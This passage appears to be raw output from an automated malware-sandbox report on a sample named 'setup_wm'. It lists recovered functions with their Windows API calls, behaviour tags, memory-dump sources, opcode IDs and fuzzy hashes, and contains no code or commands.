Instruction Fuzzy Hash: EA224434648B444FDB6CDA5CC88E6B9B7D2FB95300F24596DE9CBC3282DA34D846CB81

Function 0000021CE78ECDF4 Relevance: 4.6, APIs: 3, Instructions: 110
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeW.KERNELBASE ref: 0000021CE78ECEA7
BindIoCompletionCallback.KERNEL32 ref: 0000021CE78ECEDE
ConnectNamedPipe.KERNELBASE ref: 0000021CE78ECEEF

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: NamedPipe$BindCallbackCompletionConnectCreate
String ID:
API String ID: 2502124517-0
Opcode ID: 1f39a579d535edce93b33f8ad890ac1eeea552d42be0d6d7d28d92d913c1a808
Instruction ID: 5f03bfc95634c14ed31c6200fb50f60c7053f4cc6752adf76a1d497000f05cdf
Opcode Fuzzy Hash: 1f39a579d535edce93b33f8ad890ac1eeea552d42be0d6d7d28d92d913c1a808
Instruction Fuzzy Hash: 3731F330608A488FE7A4EF28D8D8B9A77E4FBA8310F104629E45BD31D1DF74C945CB81

Function 00007DF4B9912704 Relevance: 4.5, APIs: 3, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 00007DF4B9912715
malloc.MSVCRT ref: 00007DF4B9912731
NtQuerySystemInformation.NTDLL ref: 00007DF4B9912755

Memory Dump Source

Source File: 00000008.00000002.2585736667.00007DF4B9911000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9911000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7df4b9911000_setup_wm.jbxd

Similarity

API ID: InformationQuerySystem$malloc
String ID:
API String ID: 1603438391-0
Opcode ID: eaf85d99e703aa885d9be82610ad3d8d03a394a4204a017367fdf17adc8f3dbe
Instruction ID: ef64bc9660ec9a510cccdaaf5e7218a9e25e7b0d43d3d8c924f45f9493ceca8b
Opcode Fuzzy Hash: eaf85d99e703aa885d9be82610ad3d8d03a394a4204a017367fdf17adc8f3dbe
Instruction Fuzzy Hash: A9011D306199469BE789FF64DC68A6A77E5FB94305F440128A40BC22A0DF38E555CB42

Function 0000021CE78F2C64 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 0000021CE78F2CBC

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: f6b0f352e34b93935ac2a1f97fa2b0892be8d0a68ee0d9962c8f94757f801c03
Instruction ID: b4828e83b04500744265a7c7b7602158eee8cf68f408db905c22cd195b815467
Opcode Fuzzy Hash: f6b0f352e34b93935ac2a1f97fa2b0892be8d0a68ee0d9962c8f94757f801c03
Instruction Fuzzy Hash: EA21C075708A4C4FE768EF5888CD3AE76E0F7B8311F70053FEA4AD3250DA2489448781

Function 00007DF4B99022CC Relevance: 3.4, APIs: 2, Instructions: 450
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007DF4B9901290: RtlAddFunctionTable.KERNEL32 ref: 00007DF4B99012BD

Part of subcall function 00007DF4B99012C8: VirtualProtect.KERNELBASE ref: 00007DF4B99012F5

calloc.MSVCRT ref: 00007DF4B990234F
SetTimer.USER32 ref: 00007DF4B9902762

Memory Dump Source

Source File: 00000008.00000002.2585645214.00007DF4B9901000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9901000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7df4b9901000_setup_wm.jbxd

Similarity

API ID: FunctionProtectTableTimerVirtualcalloc
String ID:
API String ID: 2994753352-0
Opcode ID: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
Instruction ID: dfd5b76e9ef5bdacf7cfc5447ccc54219895a0aae5f24c686f60136e89fe5320
Opcode Fuzzy Hash: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
Instruction Fuzzy Hash: FCE1A230608A495FEB99EF68D8885AE77E5FF98304F14463EE05BC3292DB34E9458741

Function 0000021CE78E2628 Relevance: 3.3, APIs: 2, Instructions: 293
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 0000021CE78E272E
SuspendThread.KERNELBASE ref: 0000021CE78E2770

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: CloseHandleSuspendThread
String ID:
API String ID: 1038686644-0
Opcode ID: ee0b4b29cbf429cf193f7da3647d56e0b1a845656fd74a12addcfb7ee39e090b
Instruction ID: 25897055f271efbe47f8bcd0a2b01c456473577606368e2f9da1e5dda38d4355
Opcode Fuzzy Hash: ee0b4b29cbf429cf193f7da3647d56e0b1a845656fd74a12addcfb7ee39e090b
Instruction Fuzzy Hash: 9791CE34248F298BEB7CDB18DC992A973D1FB79310F24426DD54ADA181DB35D842CBC2

Function 0000021CE78EC25C Relevance: 1.8, APIs: 1, Instructions: 560memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 0000021CE78EC65C

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1463b6e579e83794cd598155eb9e3160b38bf0e3bcb0f61670329aaf0c67c5a2
Instruction ID: b530a6725cd324042ffbf1811e0162ffdd5a111c7c39f76238bdebd31ddd0ce2
Opcode Fuzzy Hash: 1463b6e579e83794cd598155eb9e3160b38bf0e3bcb0f61670329aaf0c67c5a2
Instruction Fuzzy Hash: D1F13830A586680EE73C9B2C9C8A2B977D1F7A5301F38027ED5DBD6283DA38D54687C1

Function 0000021CE78F29D4 Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 0000021CE78F2A94

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: f13696e1930880e2e19ebf6412232386b6a4ab7a0f564d2111b2459b68bcc0da
Instruction ID: 932951d74b6adf611d082e4e53fa52740378401e65f840b3c4b2ac0588705d64
Opcode Fuzzy Hash: f13696e1930880e2e19ebf6412232386b6a4ab7a0f564d2111b2459b68bcc0da
Instruction Fuzzy Hash: AA81C738259B0D8BE77DDF19944A7AEB3D0FBB8310F704639E956D7190EA64D80186C2

Function 0000021CE78F27B8 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 0000021CE78F2807

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: d9381645012d00cf6e7f8dfe8da443d67e907387f0873f85681973196ff3555c
Instruction ID: 8513f9e5f8203e0fede5ab71e316db94502e7cdaedeefe752e39dc9265d25033
Opcode Fuzzy Hash: d9381645012d00cf6e7f8dfe8da443d67e907387f0873f85681973196ff3555c
Instruction Fuzzy Hash: 4FF0DA74A28B488FDB64EF2CD489B9A77E0FBA9300F604519E84CC3245DB34D8448B86

Function 0000021CE78F2990 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 0000021CE78F29BA

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 98d03459468cdcd74854b97b597847e55f0ea75636d4913b4c299d0c762e3800
Instruction ID: 1842e35e186cee448ebb38d6ccaf33a4e6bddc5b65c4f8ea8d928e27ff3ca4d1
Opcode Fuzzy Hash: 98d03459468cdcd74854b97b597847e55f0ea75636d4913b4c299d0c762e3800
Instruction Fuzzy Hash: 36E09275208B088FDB08EF98CCC5DADB3E4E7E9300F504D3AE99AC7164D264D648CAD2

Function 0000021CE78F252C Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 0000021CE78F254D

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 27a0ab9b8b81d19b55a36d5b88940b5d877d47714e961321c564cf766a84aa8c
Instruction ID: 70a96e08a9f535138150397e516dad485f165f63a03304334b02429c38630a29
Opcode Fuzzy Hash: 27a0ab9b8b81d19b55a36d5b88940b5d877d47714e961321c564cf766a84aa8c
Instruction Fuzzy Hash: ABD01238A58B498BD754AB2C89466097BE1B7E9318F644628E858D3314E238D4418686

Function 0000021CE78F28B8 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 0000021CE78F28D9

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: bd75e34d41d0a0c218f00c4b384fa59cf13494ae4b0fc6bee219bc2a66024f0a
Instruction ID: 7f5770d8b239baeda91caba43020563c7943f4d6398bee8909e1e9fb02a5a8a5
Opcode Fuzzy Hash: bd75e34d41d0a0c218f00c4b384fa59cf13494ae4b0fc6bee219bc2a66024f0a
Instruction Fuzzy Hash: 83D01238DA8B498BD624AB6888456497BE1BBE9314F644618E885D3314E338D4418786

Function 0000021CE78F288C Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 0000021CE78F28A7

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 1d483c746a178fd7cebb358bd60c8d391381be698edd62c71eedc0381d53c554
Instruction ID: 78294eb383402c04b15becfc21e4e76b6608c73156f3f449eb6e179b0b003821
Opcode Fuzzy Hash: 1d483c746a178fd7cebb358bd60c8d391381be698edd62c71eedc0381d53c554
Instruction Fuzzy Hash: A6D0A738A78B4D4FEA28B728894130937D1F7F5308FA046189848D3254D62DD40047C2

Function 0000021CE78F2418 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 0000021CE78F2428

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 2134b33d09b848e70ba1f23de37cfdd97cd4e92c7083e33fbb9b34bfa8345c36
Instruction ID: 74795932b49b6684d6fd7fcdb4116b6392b87d016eaf4a0c687eabd4f7166a80
Opcode Fuzzy Hash: 2134b33d09b848e70ba1f23de37cfdd97cd4e92c7083e33fbb9b34bfa8345c36
Instruction Fuzzy Hash: ABC08C28A5590F0AE92DB2BA8C8674C2080A7BA340FD00020A918C2180F48CC8D043E6

Function 0000021CE78F28E8 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,0000021CE78E531B), ref: 0000021CE78F28F8

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 14fbc5d4ea2d13eb613c5f0cfb1986910ad3174e43fd425e2ce4bb45159b65c3
Instruction ID: 11f9ae88f4ccccf877653134ecbe39232510294bcfc7fbf8187696dba8e73a39
Opcode Fuzzy Hash: 14fbc5d4ea2d13eb613c5f0cfb1986910ad3174e43fd425e2ce4bb45159b65c3
Instruction Fuzzy Hash: 68C08C28669E0E0AE92CA2B98C86B5C2280A369314F9000109825D2180E80CD5C043D2

Function 00007DF4B9901438 Relevance: 6.1, APIs: 4, Instructions: 134registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE ref: 00007DF4B9901497
RegQueryValueExW.KERNELBASE ref: 00007DF4B99014E6
RegCloseKey.KERNELBASE ref: 00007DF4B990150C
GetVolumeInformationW.KERNELBASE ref: 00007DF4B9901570

Memory Dump Source

Source File: 00000008.00000003.1706002611.00007DF4B9901000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9901000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_7df4b9901000_setup_wm.jbxd

Similarity

API ID: CloseInformationOpenQueryValueVolume
String ID:
API String ID: 4069062851-0
Opcode ID: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
Instruction ID: 18d55bb6c52e677a0b31d4054310c68b842634477fdd1706a9f0fa912edcd986
Opcode Fuzzy Hash: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
Instruction Fuzzy Hash: 80414D3161CA488BE755EB64C899BDBB7F1FB94305F004A2EE08BC7291EF78D5048B42

Function 0000021CE78F7DA0 Relevance: 6.1, APIs: 4, Instructions: 130
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0000021CE78F7DA9
socket.WS2_32 ref: 0000021CE78FB24B
getsockopt.WS2_32 ref: 0000021CE78FB27F
socket.WS2_32 ref: 0000021CE78FB2B4

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: socket$ErrorModegetsockopt
String ID:
API String ID: 552242919-0
Opcode ID: 3bad8950bc8ed42d49e75fcab8a12e6def80f6fb96da2e8da31b13afe45452c3
Instruction ID: 199eb65380debec91ad5ac6a931cb14d3d83f1b75a946a9c1c5e1758a2b665a9
Opcode Fuzzy Hash: 3bad8950bc8ed42d49e75fcab8a12e6def80f6fb96da2e8da31b13afe45452c3
Instruction Fuzzy Hash: A44199346587498FE769EF38D89D6AA77E5FBA8300F50463DE047C32A1DB388515CB81

Function 0000021CE78EDFC4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 0000021CE78EE047
VirtualProtect.KERNELBASE ref: 0000021CE78EE070

Strings

rE\, xrefs: 0000021CE78EDFDC

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: ProtectVirtual
String ID: rE\
API String ID: 544645111-988334199
Opcode ID: fd197d1d460a7a7097ebc69198cfe8898b84731961e3c45740b5833891c72836
Instruction ID: e810997a5dcf3ff7d26791e7c76de9ff2014296c2f6eb402b544581b31bb5d1e
Opcode Fuzzy Hash: fd197d1d460a7a7097ebc69198cfe8898b84731961e3c45740b5833891c72836
Instruction Fuzzy Hash: 8411B235348E090BEB55FB5898D5BE972D6F7F8300F600539A50BC7286EF28DD458781

Function 0000021CE78EBBF0 Relevance: 4.6, APIs: 3, Instructions: 110
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingW.KERNELBASE ref: 0000021CE78EBC4C
MapViewOfFile.KERNELBASE ref: 0000021CE78EBC6E
CloseHandle.KERNELBASE ref: 0000021CE78EBCE6

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: File$CloseHandleMappingOpenView
String ID:
API String ID: 2553196624-0
Opcode ID: 8bb8605ac1c349b7ed951fd2da0efd1c73228fe5391c7a5f19e2fcd3618d3200
Instruction ID: f91751d5b9091584533dc7ad72dd7d5623a374e52697d6a76f9ed686b4d61fb0
Opcode Fuzzy Hash: 8bb8605ac1c349b7ed951fd2da0efd1c73228fe5391c7a5f19e2fcd3618d3200
Instruction Fuzzy Hash: 75319535618A0C8FEB65FF24D88AAEAB7D4FBB4300F60453BA94BC7181DE34D5598781

Function 0000021CE78EB9D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32 ref: 0000021CE78EBB1F

Strings

P, xrefs: 0000021CE78EBA46

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: CreateWindow
String ID: P
API String ID: 716092398-3110715001
Opcode ID: 3958d680dd61ed40200acf61cd907bfc270c34c5250da5fbb8d7e78c828db693
Instruction ID: 2a8aa001363b1658d8292375844ccf1782790335196e81ef2f9641d51dea8438
Opcode Fuzzy Hash: 3958d680dd61ed40200acf61cd907bfc270c34c5250da5fbb8d7e78c828db693
Instruction Fuzzy Hash: E6511F70518B448FD7A5EF28E88A79ABBE4FBA9311F10462FE08EC2150DF349545CB83

Function 00007DF4B9913018 Relevance: 3.3, APIs: 2, Instructions: 297
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007DF4B9911708: RtlAddFunctionTable.KERNEL32 ref: 00007DF4B9911735

Part of subcall function 00007DF4B9911740: VirtualProtect.KERNELBASE ref: 00007DF4B991176D

calloc.MSVCRT ref: 00007DF4B991313A
SendMessageA.USER32 ref: 00007DF4B99131FB

Memory Dump Source

Source File: 00000008.00000002.2585736667.00007DF4B9911000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9911000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7df4b9911000_setup_wm.jbxd

Similarity

API ID: FunctionMessageProtectSendTableVirtualcalloc
String ID:
API String ID: 2453823186-0
Opcode ID: 06791c2761ba3497e0c9077ab5921302019734c58a86a701aa2be8a22ea6a1e2
Instruction ID: 03dcd1b0e930569cd68c8fc73360ca7d003245240c937f1e22aa8e2be23547dc
Opcode Fuzzy Hash: 06791c2761ba3497e0c9077ab5921302019734c58a86a701aa2be8a22ea6a1e2
Instruction Fuzzy Hash: B691973060CA596FEB98EF68D4965AA77F2FB54304B104A3ED04BC3292DE38E855C781

Function 0000021CE78E22D0 Relevance: 3.2, APIs: 2, Instructions: 222
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 0000021CE78E22E8
VirtualAlloc.KERNELBASE ref: 0000021CE78E23B4

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: AllocInfoSystemVirtual
String ID:
API String ID: 3440192736-0
Opcode ID: 9420d4d47bb5eb7f06d7fea4bf54311970c83033f74d5905fb72208c54926d5e
Instruction ID: f01dcb7b05c56c506b315a0eed78571f198051dd572548d1cdc744b41759e736
Opcode Fuzzy Hash: 9420d4d47bb5eb7f06d7fea4bf54311970c83033f74d5905fb72208c54926d5e
Instruction Fuzzy Hash: 9E51C134258F0D4FEB69AB6C984C3AA73D1F7B8305F244139E54AD72A5EB64C8818BC1

Function 0000021CE78ED594 Relevance: 3.1, APIs: 2, Instructions: 132
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000021CE78EA9C0: malloc.MSVCRT(?,?,?,?,?,?,?,?,?,0000021CE78F0BFB), ref: 0000021CE78EA9DF

MapViewOfFile.KERNELBASE ref: 0000021CE78ED5D8
CloseHandle.KERNELBASE ref: 0000021CE78ED62C

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: CloseFileHandleViewmalloc
String ID:
API String ID: 4055022194-0
Opcode ID: f5e4ace49f8dbf4d208ab68c6c07d1c08f373a7b01313fe5be4b999b6ef0fbb6
Instruction ID: 7ed281874622c27cda42ca4650b6a7cce011112a43e611b9c1c5026b0d3ff519
Opcode Fuzzy Hash: f5e4ace49f8dbf4d208ab68c6c07d1c08f373a7b01313fe5be4b999b6ef0fbb6
Instruction Fuzzy Hash: 0C41B434294F088FE765FF28DC986EA73A4FBB5301F105539950ADB195DF24D80587D1

Function 0000021CE78E2974 Relevance: 3.1, APIs: 2, Instructions: 97
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 0000021CE78E29B3
VirtualProtect.KERNELBASE ref: 0000021CE78E2A19

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9af94119fb7637b7a971dd9e5dfe6689dbe62cc4b897151fb24c5dcbfab40a36
Instruction ID: 7fbabf363ccf002679a1a47996f176cb0f973774f347d61a2b2f6f05b2608a6f
Opcode Fuzzy Hash: 9af94119fb7637b7a971dd9e5dfe6689dbe62cc4b897151fb24c5dcbfab40a36
Instruction Fuzzy Hash: B1312D30308B854BE7249B6C9C987953BC1F76B314F2502A5E989CB2C5D754C802C396

Function 00007DF4B9911740 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007DF4B991176D
VirtualProtect.KERNELBASE ref: 00007DF4B99117F6

Memory Dump Source

Source File: 00000008.00000002.2585736667.00007DF4B9911000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9911000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7df4b9911000_setup_wm.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 555ee51bdfbe110a30625e9d65cd405c650e6e50b938efdbc78372c29de57681
Instruction ID: 01f47346898e02e2b4a673d142677242ce1a6be669641a6a53356f8bcd400d09
Opcode Fuzzy Hash: 555ee51bdfbe110a30625e9d65cd405c650e6e50b938efdbc78372c29de57681
Instruction Fuzzy Hash: 8721023160866777EBA89BACD484677BBF9FF90308F14813BE45BC7386D668E811C245

Function 00007DF4B99012C8 Relevance: 3.1, APIs: 2, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007DF4B99012F5
VirtualProtect.KERNELBASE ref: 00007DF4B990137E

Memory Dump Source

Source File: 00000008.00000002.2585645214.00007DF4B9901000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9901000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7df4b9901000_setup_wm.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
Instruction ID: b6424143862c6e3c1cd02dbaafe35e2285d1494d45d73f809b03246be79377b9
Opcode Fuzzy Hash: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
Instruction Fuzzy Hash: C221053160864657EBAC8BBCC440676BBF1FF94304F14813BE85BC7B86D768F8418264

Function 00007DF4B99012C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007DF4B99012F5
VirtualProtect.KERNELBASE ref: 00007DF4B990137E

Memory Dump Source

Source File: 00000008.00000003.1706002611.00007DF4B9901000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9901000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_7df4b9901000_setup_wm.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
Instruction ID: 8cbb3653b714b066a9d84e0fd6cdef105fcce13193c9241365cb338d6889283e
Opcode Fuzzy Hash: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
Instruction Fuzzy Hash: 7121F33160864657DBA88BBCC440676BBF1FF90304F14813BE85BC7B86D668F8418265

Function 0000021CE78E74A0 Relevance: 2.8, APIs: 2, Instructions: 276COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE ref: 0000021CE78E757E
free.MSVCRT ref: 0000021CE78E7715

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: FreeVirtualfree
String ID:
API String ID: 2434286298-0
Opcode ID: ef59572018a9deb8cc9717970e2f4ccce5bc515e763955c946e33fff9a11c9f9
Instruction ID: 27a91ff1c512e43f5a0698ad8f2c17753f8ed47569f6fd5b810e4f839491046b
Opcode Fuzzy Hash: ef59572018a9deb8cc9717970e2f4ccce5bc515e763955c946e33fff9a11c9f9
Instruction Fuzzy Hash: C0917134258B088FEB59EF18D889AEA73E1FB74300F504569E58ACB196DF30E955CBC1

Function 00007DF4B99015E8 Relevance: 1.7, APIs: 1, Instructions: 228COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE ref: 00007DF4B990172D

Memory Dump Source

Source File: 00000008.00000003.1706002611.00007DF4B9901000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9901000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_7df4b9901000_setup_wm.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
Instruction ID: 47df0a3013b3154a76542f88afcb85072d975e978b00a80249741e215fd42ed4
Opcode Fuzzy Hash: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
Instruction Fuzzy Hash: 5371757061C7854FD775DB79D4867ABBBE1FB94300F004A2EE59FC2252EA34A5058782

Function 0000021CE78ECA8C Relevance: 1.7, APIs: 1, Instructions: 228fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE ref: 0000021CE78ECC99

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

